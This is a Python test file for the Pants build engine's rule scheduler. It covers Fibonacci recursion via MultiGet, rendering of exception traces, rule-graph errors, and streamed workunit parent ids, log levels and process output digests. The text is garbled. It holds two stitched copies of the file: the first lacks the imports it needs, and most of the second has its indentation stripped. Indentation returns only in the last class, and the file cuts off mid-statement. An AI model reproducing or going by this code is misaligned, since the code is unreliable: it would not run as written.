from textwrap import dedent
from typing import List
from pants.engine.fs import EMPTY_DIGEST
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.internals.scheduler_test_base import SchedulerTestBase
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import RootRule, rule
from pants.engine.selectors import Get, MultiGet
from pants.reporting.streaming_workunit_handler import StreamingWorkunitHandler
from pants.testutil.engine.util import (
assert_equal_with_printing,
fmt_rule,
remove_locations_from_traceback,
)
from pants.testutil.test_base import TestBase
from pants.util.logging import LogLevel
# Empty marker types used as rule inputs/outputs throughout these tests.
class A:
    pass
class B:
    pass
class C:
    pass
class D:
    pass
def fn_raises(x):
    """Unconditionally raise, embedding the argument's type name in the message."""
    message = f"An exception for {type(x).__name__}"
    raise Exception(message)
@rule
def nested_raise(x: B) -> A: # type: ignore[return]
    # Raises through a helper so tests can assert on multi-frame tracebacks.
    fn_raises(x)
@dataclass(frozen=True)
class Fib:
    # Product type wrapping a computed Fibonacci value.
    val: int
@rule(desc="Fibonacci", level=LogLevel.INFO)
async def fib(n: int) -> Fib:
    # Naive recursive Fibonacci expressed as an engine rule; both recursive
    # steps are requested through the engine concurrently via MultiGet.
    if n < 2:
        return Fib(n)
    x, y = tuple(await MultiGet([Get[Fib](int(n - 2)), Get[Fib](int(n - 1))]))
    return Fib(x.val + y.val)
# Product types for the rule-graph validation test below (test_nonexistent_root_fails_differently).
@dataclass(frozen=True)
class MyInt:
    val: int
@dataclass(frozen=True)
class MyFloat:
    val: float
@rule
def upcast(n: MyInt) -> MyFloat:
    # Converts a MyInt product into a MyFloat product.
    return MyFloat(float(n.val))
# This set of dummy types and the following `@rule`s are intended to test that workunits are
# being generated correctly and with the correct parent-child relationships.
class Input:
    pass
class Alpha:
    pass
class Beta:
    pass
class Gamma:
    pass
class Omega:
    pass
class Epsilon:
    pass
@rule(canonical_name="rule_one", desc="Rule number 1", level=LogLevel.INFO)
async def rule_one_function(i: Input) -> Beta:
    """This rule should be the first one executed by the engine, and thus have no parent."""
    a = Alpha()
    o = await Get[Omega](Alpha, a)
    b = await Get[Beta](Omega, o)
    # Artificial delay so tests can observe this workunit as started-but-unfinished.
    time.sleep(1)
    return b
@rule(desc="Rule number 2", level=LogLevel.INFO)
async def rule_two(a: Alpha) -> Omega:
    """This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
    child of `rule_one`'s workunit."""
    await Get[Gamma](Alpha, a)
    return Omega()
@rule(desc="Rule number 3", level=LogLevel.INFO)
async def rule_three(o: Omega) -> Beta:
    """This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
    child of `rule_one`'s workunit."""
    return Beta()
@rule(desc="Rule number 4", level=LogLevel.INFO)
def rule_four(a: Alpha) -> Gamma:
    """This rule should be invoked in the body of `rule_two` and therefore its workunit should be a
    child of `rule_two`'s workunit."""
    return Gamma()
@rule(desc="Rule A", level=LogLevel.INFO)
async def rule_A(i: Input) -> Alpha:
    # INFO-level rule used by the parent-rewrite tests below.
    o = Omega()
    a = await Get[Alpha](Omega, o)
    return a
@rule
async def rule_B(o: Omega) -> Alpha:
    # NOTE(review): deliberately has no desc/level; per the assertions in
    # test_streaming_workunit_log_level_parent_rewrite, it is filtered out at
    # INFO verbosity and rule_C is re-parented to rule_A.
    e = Epsilon()
    a = await Get[Alpha](Epsilon, e)
    return a
@rule(desc="Rule C", level=LogLevel.INFO)
def rule_C(e: Epsilon) -> Alpha:
    return Alpha()
class EngineTest(unittest.TestCase, SchedulerTestBase):
    """End-to-end engine behavior: rule execution, error rendering, and rule-graph validation."""
    # Bind the helper as a method so tests can call self.assert_equal_with_printing.
    assert_equal_with_printing = assert_equal_with_printing
    def scheduler(self, rules, include_trace_on_error):
        # Thin convenience wrapper over SchedulerTestBase.mk_scheduler.
        return self.mk_scheduler(rules=rules, include_trace_on_error=include_trace_on_error)
    def test_recursive_multi_get(self):
        # Tests that a rule that "uses itself" multiple times per invoke works.
        rules = [
            fib,
            RootRule(int),
        ]
        (fib_10,) = self.mk_scheduler(rules=rules).product_request(Fib, subjects=[10])
        self.assertEqual(55, fib_10.val)
    def test_no_include_trace_error_raises_boring_error(self):
        # Without traces, a failing rule renders only the exception message.
        rules = [
            RootRule(B),
            nested_raise,
        ]
        scheduler = self.scheduler(rules, include_trace_on_error=False)
        with self.assertRaises(ExecutionError) as cm:
            list(scheduler.product_request(A, subjects=[(B())]))
        self.assert_equal_with_printing(
            "1 Exception encountered:\n\n Exception: An exception for B\n", str(cm.exception)
        )
    def test_no_include_trace_error_multiple_paths_raises_executionerror(self):
        # Two failing subjects produce two rendered exceptions in one ExecutionError.
        rules = [
            RootRule(B),
            nested_raise,
        ]
        scheduler = self.scheduler(rules, include_trace_on_error=False)
        with self.assertRaises(ExecutionError) as cm:
            list(scheduler.product_request(A, subjects=[B(), B()]))
        self.assert_equal_with_printing(
            dedent(
                """
                2 Exceptions encountered:
                Exception: An exception for B
                Exception: An exception for B
                """
            ).lstrip(),
            str(cm.exception),
        )
    def test_include_trace_error_raises_error_with_trace(self):
        # With traces enabled, the rendered error includes the Python traceback.
        rules = [
            RootRule(B),
            nested_raise,
        ]
        scheduler = self.scheduler(rules, include_trace_on_error=True)
        with self.assertRaises(ExecutionError) as cm:
            list(scheduler.product_request(A, subjects=[(B())]))
        self.assert_equal_with_printing(
            dedent(
                """
                1 Exception encountered:
                Traceback (most recent call last):
                File LOCATION-INFO, in nested_raise
                fn_raises(x)
                File LOCATION-INFO, in fn_raises
                raise Exception(f"An exception for {type(x).__name__}")
                Exception: An exception for B
                """
            ).lstrip(),
            remove_locations_from_traceback(str(cm.exception)),
        )
    @unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/6829")
    def test_trace_multi(self):
        # Tests that when multiple distinct failures occur, they are each rendered.
        @rule
        def d_from_b_nested_raise(b: B) -> D: # type: ignore[return]
            fn_raises(b)
        @rule
        def c_from_b_nested_raise(b: B) -> C: # type: ignore[return]
            fn_raises(b)
        @rule
        def a_from_c_and_d(c: C, d: D) -> A:
            return A()
        rules = [
            RootRule(B),
            d_from_b_nested_raise,
            c_from_b_nested_raise,
            a_from_c_and_d,
        ]
        scheduler = self.scheduler(rules, include_trace_on_error=True)
        with self.assertRaises(ExecutionError) as cm:
            list(scheduler.product_request(A, subjects=[(B())]))
        self.assert_equal_with_printing(
            dedent(
                f"""
                1 Exception encountered:
                Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
                Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
                Computing Task(d_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =D, true)
                Throw(An exception for B)
                Traceback (most recent call last):
                File LOCATION-INFO, in call
                val = func(*args)
                File LOCATION-INFO, in d_from_b_nested_raise
                fn_raises(b)
                File LOCATION-INFO, in fn_raises
                raise Exception('An exception for {{}}'.format(type(x).__name__))
                Exception: An exception for B
                Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
                Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
                Computing Task(c_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =C, true)
                Throw(An exception for B)
                Traceback (most recent call last):
                File LOCATION-INFO, in call
                val = func(*args)
                File LOCATION-INFO, in c_from_b_nested_raise
                fn_raises(b)
                File LOCATION-INFO, in fn_raises
                raise Exception('An exception for {{}}'.format(type(x).__name__))
                Exception: An exception for B
                """
            ).lstrip()
            + "\n",
            remove_locations_from_traceback(str(cm.exception)),
        )
    def test_illegal_root_selection(self):
        rules = [RootRule(B)]
        scheduler = self.scheduler(rules, include_trace_on_error=False)
        # No rules are available to compute A.
        with self.assertRaises(Exception) as cm:
            list(scheduler.product_request(A, subjects=[(B())]))
        self.assert_equal_with_printing(
            "No installed @rules return the type A. Is the @rule that you're expecting to run registered?",
            str(cm.exception),
        )
    def test_nonexistent_root_fails_differently(self):
        # A rule whose input type has no RootRule fails at graph-construction time.
        rules = [upcast]
        with self.assertRaises(Exception) as cm:
            list(self.mk_scheduler(rules=rules, include_trace_on_error=False))
        self.assert_equal_with_printing(
            dedent(
                f"""
                Rules with errors: 1
                {fmt_rule(upcast)}:
                No rule was available to compute MyInt. Maybe declare RootRule(MyInt)?
                """
            ).strip(),
            str(cm.exception),
        )
@dataclass
class WorkunitTracker:
    """This class records every non-empty batch of started and completed workunits received from the
    engine."""
    # One inner list per callback invocation; flatten with itertools.chain to inspect.
    finished_workunit_chunks: List[List[dict]] = field(default_factory=list)
    started_workunit_chunks: List[List[dict]] = field(default_factory=list)
    finished: bool = False
    def add(self, workunits, **kwargs) -> None:
        # Callback passed to StreamingWorkunitHandler; `finished` and
        # `started_workunits` arrive as keyword arguments.
        if kwargs["finished"] is True:
            self.finished = True
        started_workunits = kwargs.get("started_workunits")
        if started_workunits:
            self.started_workunit_chunks.append(started_workunits)
        if workunits:
            self.finished_workunit_chunks.append(workunits)
class StreamingWorkunitTests(unittest.TestCase, SchedulerTestBase):
    """Streamed workunit reporting: counts, parent/child span ids, and level filtering."""
    def test_streaming_workunits_reporting(self):
        rules = [fib, RootRule(int)]
        scheduler = self.mk_scheduler(
            rules, include_trace_on_error=False, should_report_workunits=True
        )
        tracker = WorkunitTracker()
        handler = StreamingWorkunitHandler(
            scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
        )
        with handler.session():
            scheduler.product_request(Fib, subjects=[0])
        flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        # The execution of the single named @rule "fib" should be providing this one workunit.
        self.assertEqual(len(flattened), 1)
        tracker.finished_workunit_chunks = []
        with handler.session():
            scheduler.product_request(Fib, subjects=[10])
        # Requesting a bigger fibonacci number will result in more rule executions and thus more reported workunits.
        # In this case, we expect 10 invocations of the `fib` rule.
        flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        assert len(flattened) == 10
        assert tracker.finished
    def test_streaming_workunits_parent_id_and_rule_metadata(self):
        rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
        scheduler = self.mk_scheduler(
            rules, include_trace_on_error=False, should_report_workunits=True
        )
        tracker = WorkunitTracker()
        handler = StreamingWorkunitHandler(
            scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
        )
        with handler.session():
            i = Input()
            scheduler.product_request(Beta, subjects=[i])
        assert tracker.finished
        # rule_one should complete well-after the other rules because of the artificial delay in it caused by the sleep().
        assert {item["name"] for item in tracker.finished_workunit_chunks[0]} == {
            "rule_two",
            "rule_three",
            "rule_four",
        }
        # Because of the artificial delay in rule_one, it should have time to be reported as
        # started but not yet finished.
        started = list(itertools.chain.from_iterable(tracker.started_workunit_chunks))
        assert len(list(item for item in started if item["name"] == "rule_one")) > 0
        assert {item["name"] for item in tracker.finished_workunit_chunks[1]} == {"rule_one"}
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        r1 = next(item for item in finished if item["name"] == "rule_one")
        r2 = next(item for item in finished if item["name"] == "rule_two")
        r3 = next(item for item in finished if item["name"] == "rule_three")
        r4 = next(item for item in finished if item["name"] == "rule_four")
        # rule_one should have no parent_id because its actual parent workunit was filted based on level
        assert r1.get("parent_id", None) is None
        assert r2["parent_id"] == r1["span_id"]
        assert r3["parent_id"] == r1["span_id"]
        assert r4["parent_id"] == r2["span_id"]
        assert r3["description"] == "Rule number 3"
        assert r4["description"] == "Rule number 4"
        assert r4["level"] == "INFO"
    def test_streaming_workunit_log_levels(self) -> None:
        rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
        scheduler = self.mk_scheduler(
            rules, include_trace_on_error=False, should_report_workunits=True
        )
        tracker = WorkunitTracker()
        handler = StreamingWorkunitHandler(
            scheduler,
            callbacks=[tracker.add],
            report_interval_seconds=0.01,
            max_workunit_verbosity=LogLevel.TRACE,
        )
        with handler.session():
            i = Input()
            scheduler.product_request(Beta, subjects=[i])
        assert tracker.finished
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        # With the max_workunit_verbosity set to TRACE, we should see the workunit corresponding to the Select node.
        select = next(
            item
            for item in finished
            if item["name"] not in {"rule_one", "rule_two", "rule_three", "rule_four"}
        )
        assert select["name"] == "select"
        assert select["level"] == "DEBUG"
        r1 = next(item for item in finished if item["name"] == "rule_one")
        assert r1["parent_id"] == select["span_id"]
    def test_streaming_workunit_log_level_parent_rewrite(self) -> None:
        # At INFO verbosity, the un-leveled rule_B is filtered out and rule_C is
        # re-parented to rule_A; at DEBUG verbosity the full chain is visible.
        rules = [RootRule(Input), rule_A, rule_B, rule_C]
        scheduler = self.mk_scheduler(
            rules, include_trace_on_error=False, should_report_workunits=True
        )
        tracker = WorkunitTracker()
        info_level_handler = StreamingWorkunitHandler(
            scheduler,
            callbacks=[tracker.add],
            report_interval_seconds=0.01,
            max_workunit_verbosity=LogLevel.INFO,
        )
        with info_level_handler.session():
            i = Input()
            scheduler.product_request(Alpha, subjects=[i])
        assert tracker.finished
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        assert len(finished) == 2
        r_A = next(item for item in finished if item["name"] == "rule_A")
        r_C = next(item for item in finished if item["name"] == "rule_C")
        assert "parent_id" not in r_A
        assert r_C["parent_id"] == r_A["span_id"]
        scheduler = self.mk_scheduler(
            rules, include_trace_on_error=False, should_report_workunits=True
        )
        tracker = WorkunitTracker()
        debug_level_handler = StreamingWorkunitHandler(
            scheduler,
            callbacks=[tracker.add],
            report_interval_seconds=0.01,
            max_workunit_verbosity=LogLevel.DEBUG,
        )
        with debug_level_handler.session():
            i = Input()
            scheduler.product_request(Alpha, subjects=[i])
        assert tracker.finished
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        r_A = next(item for item in finished if item["name"] == "rule_A")
        r_B = next(item for item in finished if item["name"] == "rule_B")
        r_C = next(item for item in finished if item["name"] == "rule_C")
        assert r_B["parent_id"] == r_A["span_id"]
        assert r_C["parent_id"] == r_B["span_id"]
class StreamingWorkunitProcessTests(TestBase):
    """Verify that executed processes attach stdout/stderr digests to their workunits."""
    # Disable the local process cache so the processes actually execute and report.
    additional_options = ["--no-process-execution-use-local-cache"]
    def test_process_digests_on_workunits(self):
        self._init_engine() # need to call this so that self._scheduler is not None when we pass it to StreamingWorkunitHandler
        tracker = WorkunitTracker()
        handler = StreamingWorkunitHandler(
            self._scheduler,
            callbacks=[tracker.add],
            report_interval_seconds=0.01,
            max_workunit_verbosity=LogLevel.INFO,
        )
        stdout_process = Process(
            argv=("/bin/bash", "-c", "/bin/echo 'stdout output'"), description="Stdout process"
        )
        with handler.session():
            result = self.request_single_product(ProcessResult, stdout_process)
        assert tracker.finished
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        process_workunit = next(
            item for item in finished if item["name"] == "multi_platform_process-running"
        )
        assert process_workunit is not None
        stdout_digest = process_workunit["artifacts"]["stdout_digest"]
        stderr_digest = process_workunit["artifacts"]["stderr_digest"]
        # A stdout-only process: stderr digest must be the empty digest, and the
        # stdout digest's recorded length must match the captured bytes.
        assert result.stdout == b"stdout output\n"
        assert stderr_digest == EMPTY_DIGEST
        assert stdout_digest.serialized_bytes_length == len(result.stdout)
        tracker = WorkunitTracker()
        handler = StreamingWorkunitHandler(
            self._scheduler,
            callbacks=[tracker.add],
            report_interval_seconds=0.01,
            max_workunit_verbosity=LogLevel.INFO,
        )
        stderr_process = Process(
            argv=("/bin/bash", "-c", "1>&2 /bin/echo 'stderr output'"), description="Stderr process"
        )
        with handler.session():
            result = self.request_single_product(ProcessResult, stderr_process)
        assert tracker.finished
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        process_workunit = next(
            item for item in finished if item["name"] == "multi_platform_process-running"
        )
        assert process_workunit is not None
        stdout_digest = process_workunit["artifacts"]["stdout_digest"]
        stderr_digest = process_workunit["artifacts"]["stderr_digest"]
        # Mirror case: stderr-only process.
        assert result.stderr == b"stderr output\n"
        assert stdout_digest == EMPTY_DIGEST
        assert stderr_digest.serialized_bytes_length == len(result.stderr)
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import itertools
import time
import unittest
from dataclasses import dataclass, field
from textwrap import dedent
from typing import List
from pants.engine.fs import EMPTY_DIGEST
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.internals.scheduler_test_base import SchedulerTestBase
from pants.engine.process import Process, ProcessResult
from pants.engine.rules import RootRule, rule
from pants.engine.selectors import Get, MultiGet
from pants.reporting.streaming_workunit_handler import StreamingWorkunitHandler
from pants.testutil.engine.util import (
assert_equal_with_printing,
fmt_rule,
remove_locations_from_traceback,
)
from pants.testutil.test_base import TestBase
from pants.util.logging import LogLevel
class A:
pass
class B:
pass
class C:
pass
class D:
pass
def fn_raises(x):
raise Exception(f"An exception for {type(x).__name__}")
@rule
def nested_raise(x: B) -> A: # type: ignore[return]
fn_raises(x)
@dataclass(frozen=True)
class Fib:
val: int
@rule(desc="Fibonacci", level=LogLevel.INFO)
async def fib(n: int) -> Fib:
if n < 2:
return Fib(n)
x, y = tuple(await MultiGet([Get[Fib](int(n - 2)), Get[Fib](int(n - 1))]))
return Fib(x.val + y.val)
@dataclass(frozen=True)
class MyInt:
val: int
@dataclass(frozen=True)
class MyFloat:
val: float
@rule
def upcast(n: MyInt) -> MyFloat:
return MyFloat(float(n.val))
# This set of dummy types and the following `@rule`s are intended to test that workunits are
# being generated correctly and with the correct parent-child relationships.
class Input:
pass
class Alpha:
pass
class Beta:
pass
class Gamma:
pass
class Omega:
pass
class Epsilon:
pass
@rule(canonical_name="rule_one", desc="Rule number 1", level=LogLevel.INFO)
async def rule_one_function(i: Input) -> Beta:
"""This rule should be the first one executed by the engine, and thus have no parent."""
a = Alpha()
o = await Get[Omega](Alpha, a)
b = await Get[Beta](Omega, o)
time.sleep(1)
return b
@rule(desc="Rule number 2", level=LogLevel.INFO)
async def rule_two(a: Alpha) -> Omega:
"""This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
child of `rule_one`'s workunit."""
await Get[Gamma](Alpha, a)
return Omega()
@rule(desc="Rule number 3", level=LogLevel.INFO)
async def rule_three(o: Omega) -> Beta:
"""This rule should be invoked in the body of `rule_one` and therefore its workunit should be a
child of `rule_one`'s workunit."""
return Beta()
@rule(desc="Rule number 4", level=LogLevel.INFO)
def rule_four(a: Alpha) -> Gamma:
"""This rule should be invoked in the body of `rule_two` and therefore its workunit should be a
child of `rule_two`'s workunit."""
return Gamma()
@rule(desc="Rule A", level=LogLevel.INFO)
async def rule_A(i: Input) -> Alpha:
o = Omega()
a = await Get[Alpha](Omega, o)
return a
@rule
async def rule_B(o: Omega) -> Alpha:
e = Epsilon()
a = await Get[Alpha](Epsilon, e)
return a
@rule(desc="Rule C", level=LogLevel.INFO)
def rule_C(e: Epsilon) -> Alpha:
return Alpha()
class EngineTest(unittest.TestCase, SchedulerTestBase):
assert_equal_with_printing = assert_equal_with_printing
def scheduler(self, rules, include_trace_on_error):
return self.mk_scheduler(rules=rules, include_trace_on_error=include_trace_on_error)
def test_recursive_multi_get(self):
# Tests that a rule that "uses itself" multiple times per invoke works.
rules = [
fib,
RootRule(int),
]
(fib_10,) = self.mk_scheduler(rules=rules).product_request(Fib, subjects=[10])
self.assertEqual(55, fib_10.val)
def test_no_include_trace_error_raises_boring_error(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=False)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
"1 Exception encountered:\n\n Exception: An exception for B\n", str(cm.exception)
)
def test_no_include_trace_error_multiple_paths_raises_executionerror(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=False)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[B(), B()]))
self.assert_equal_with_printing(
dedent(
"""
2 Exceptions encountered:
Exception: An exception for B
Exception: An exception for B
"""
).lstrip(),
str(cm.exception),
)
def test_include_trace_error_raises_error_with_trace(self):
rules = [
RootRule(B),
nested_raise,
]
scheduler = self.scheduler(rules, include_trace_on_error=True)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
dedent(
"""
1 Exception encountered:
Traceback (most recent call last):
File LOCATION-INFO, in nested_raise
fn_raises(x)
File LOCATION-INFO, in fn_raises
raise Exception(f"An exception for {type(x).__name__}")
Exception: An exception for B
"""
).lstrip(),
remove_locations_from_traceback(str(cm.exception)),
)
@unittest.skip("flaky: https://github.com/pantsbuild/pants/issues/6829")
def test_trace_multi(self):
# Tests that when multiple distinct failures occur, they are each rendered.
@rule
def d_from_b_nested_raise(b: B) -> D: # type: ignore[return]
fn_raises(b)
@rule
def c_from_b_nested_raise(b: B) -> C: # type: ignore[return]
fn_raises(b)
@rule
def a_from_c_and_d(c: C, d: D) -> A:
return A()
rules = [
RootRule(B),
d_from_b_nested_raise,
c_from_b_nested_raise,
a_from_c_and_d,
]
scheduler = self.scheduler(rules, include_trace_on_error=True)
with self.assertRaises(ExecutionError) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
dedent(
f"""
1 Exception encountered:
Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
Computing Task(d_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =D, true)
Throw(An exception for B)
Traceback (most recent call last):
File LOCATION-INFO, in call
val = func(*args)
File LOCATION-INFO, in d_from_b_nested_raise
fn_raises(b)
File LOCATION-INFO, in fn_raises
raise Exception('An exception for {{}}'.format(type(x).__name__))
Exception: An exception for B
Computing Select(<{__name__}..B object at 0xEEEEEEEEE>, A)
Computing Task(a_from_c_and_d(), <{__name__}..B object at 0xEEEEEEEEE>, A, true)
Computing Task(c_from_b_nested_raise(), <{__name__}..B object at 0xEEEEEEEEE>, =C, true)
Throw(An exception for B)
Traceback (most recent call last):
File LOCATION-INFO, in call
val = func(*args)
File LOCATION-INFO, in c_from_b_nested_raise
fn_raises(b)
File LOCATION-INFO, in fn_raises
raise Exception('An exception for {{}}'.format(type(x).__name__))
Exception: An exception for B
"""
).lstrip()
+ "\n",
remove_locations_from_traceback(str(cm.exception)),
)
def test_illegal_root_selection(self):
rules = [RootRule(B)]
scheduler = self.scheduler(rules, include_trace_on_error=False)
# No rules are available to compute A.
with self.assertRaises(Exception) as cm:
list(scheduler.product_request(A, subjects=[(B())]))
self.assert_equal_with_printing(
"No installed @rules return the type A. Is the @rule that you're expecting to run registered?",
str(cm.exception),
)
def test_nonexistent_root_fails_differently(self):
rules = [upcast]
with self.assertRaises(Exception) as cm:
list(self.mk_scheduler(rules=rules, include_trace_on_error=False))
self.assert_equal_with_printing(
dedent(
f"""
Rules with errors: 1
{fmt_rule(upcast)}:
No rule was available to compute MyInt. Maybe declare RootRule(MyInt)?
"""
).strip(),
str(cm.exception),
)
@dataclass
class WorkunitTracker:
"""This class records every non-empty batch of started and completed workunits received from the
engine."""
finished_workunit_chunks: List[List[dict]] = field(default_factory=list)
started_workunit_chunks: List[List[dict]] = field(default_factory=list)
finished: bool = False
def add(self, workunits, **kwargs) -> None:
if kwargs["finished"] is True:
self.finished = True
started_workunits = kwargs.get("started_workunits")
if started_workunits:
self.started_workunit_chunks.append(started_workunits)
if workunits:
self.finished_workunit_chunks.append(workunits)
class StreamingWorkunitTests(unittest.TestCase, SchedulerTestBase):
def test_streaming_workunits_reporting(self):
rules = [fib, RootRule(int)]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
)
with handler.session():
scheduler.product_request(Fib, subjects=[0])
flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
# The execution of the single named @rule "fib" should be providing this one workunit.
self.assertEqual(len(flattened), 1)
tracker.finished_workunit_chunks = []
with handler.session():
scheduler.product_request(Fib, subjects=[10])
# Requesting a bigger fibonacci number will result in more rule executions and thus more reported workunits.
# In this case, we expect 10 invocations of the `fib` rule.
flattened = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
assert len(flattened) == 10
assert tracker.finished
def test_streaming_workunits_parent_id_and_rule_metadata(self):
rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler, callbacks=[tracker.add], report_interval_seconds=0.01
)
with handler.session():
i = Input()
scheduler.product_request(Beta, subjects=[i])
assert tracker.finished
# rule_one should complete well-after the other rules because of the artificial delay in it caused by the sleep().
assert {item["name"] for item in tracker.finished_workunit_chunks[0]} == {
"rule_two",
"rule_three",
"rule_four",
}
# Because of the artificial delay in rule_one, it should have time to be reported as
# started but not yet finished.
started = list(itertools.chain.from_iterable(tracker.started_workunit_chunks))
assert len(list(item for item in started if item["name"] == "rule_one")) > 0
assert {item["name"] for item in tracker.finished_workunit_chunks[1]} == {"rule_one"}
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
r1 = next(item for item in finished if item["name"] == "rule_one")
r2 = next(item for item in finished if item["name"] == "rule_two")
r3 = next(item for item in finished if item["name"] == "rule_three")
r4 = next(item for item in finished if item["name"] == "rule_four")
# rule_one should have no parent_id because its actual parent workunit was filted based on level
assert r1.get("parent_id", None) is None
assert r2["parent_id"] == r1["span_id"]
assert r3["parent_id"] == r1["span_id"]
assert r4["parent_id"] == r2["span_id"]
assert r3["description"] == "Rule number 3"
assert r4["description"] == "Rule number 4"
assert r4["level"] == "INFO"
def test_streaming_workunit_log_levels(self) -> None:
rules = [RootRule(Input), rule_one_function, rule_two, rule_three, rule_four]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.TRACE,
)
with handler.session():
i = Input()
scheduler.product_request(Beta, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
# With the max_workunit_verbosity set to TRACE, we should see the workunit corresponding to the Select node.
select = next(
item
for item in finished
if item["name"] not in {"rule_one", "rule_two", "rule_three", "rule_four"}
)
assert select["name"] == "select"
assert select["level"] == "DEBUG"
r1 = next(item for item in finished if item["name"] == "rule_one")
assert r1["parent_id"] == select["span_id"]
def test_streaming_workunit_log_level_parent_rewrite(self) -> None:
rules = [RootRule(Input), rule_A, rule_B, rule_C]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
info_level_handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.INFO,
)
with info_level_handler.session():
i = Input()
scheduler.product_request(Alpha, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
assert len(finished) == 2
r_A = next(item for item in finished if item["name"] == "rule_A")
r_C = next(item for item in finished if item["name"] == "rule_C")
assert "parent_id" not in r_A
assert r_C["parent_id"] == r_A["span_id"]
scheduler = self.mk_scheduler(
rules, include_trace_on_error=False, should_report_workunits=True
)
tracker = WorkunitTracker()
debug_level_handler = StreamingWorkunitHandler(
scheduler,
callbacks=[tracker.add],
report_interval_seconds=0.01,
max_workunit_verbosity=LogLevel.DEBUG,
)
with debug_level_handler.session():
i = Input()
scheduler.product_request(Alpha, subjects=[i])
assert tracker.finished
finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
r_A = next(item for item in finished if item["name"] == "rule_A")
r_B = next(item for item in finished if item["name"] == "rule_B")
r_C = next(item for item in finished if item["name"] == "rule_C")
assert r_B["parent_id"] == r_A["span_id"]
assert r_C["parent_id"] == r_B["span_id"]
class StreamingWorkunitProcessTests(TestBase):
    """Process executions must attach stdout/stderr digests to their workunits."""

    # Disable the local process cache so the processes below actually run.
    additional_options = ["--no-process-execution-use-local-cache"]
    def test_process_digests_on_workunits(self):
        """The running-process workunit carries digests matching the real output."""
        self._init_engine() # need to call this so that self._scheduler is not None when we pass it to StreamingWorkunitHandler
        tracker = WorkunitTracker()
        handler = StreamingWorkunitHandler(
            self._scheduler,
            callbacks=[tracker.add],
            report_interval_seconds=0.01,
            max_workunit_verbosity=LogLevel.INFO,
        )
        stdout_process = Process(
            argv=("/bin/bash", "-c", "/bin/echo 'stdout output'"), description="Stdout process"
        )
        with handler.session():
            result = self.request_single_product(ProcessResult, stdout_process)
        assert tracker.finished
        finished = list(itertools.chain.from_iterable(tracker.finished_workunit_chunks))
        process_workunit = next(
            item for item in finished if item["name"] == "multi_platform_process-running"
        )
        assert process_workunit is not None
        stdout_digest = process_workunit["artifacts"]["stdout_digest"]
        stderr_digest = process_workunit["artifacts"]["stderr_digest"]
        # The stdout digest must describe exactly the bytes the process wrote;
        # stderr was silent, so its digest is the empty digest.
        assert result.stdout == b"stdout output\n"
        assert stderr_digest == EMPTY_DIGEST
        assert stdout_digest.serialized_bytes_length == len(result.stdout)
        # Repeat with a process that writes to stderr instead of stdout.
        tracker = WorkunitTracker()
        handler = StreamingWorkunitHandler(
            self._scheduler,
            callbacks=[tracker.add],
            report_interval_seconds=0.01,
            max_workunit_verbosity=LogLevel.INFO,
        )
        stderr_process = Process(
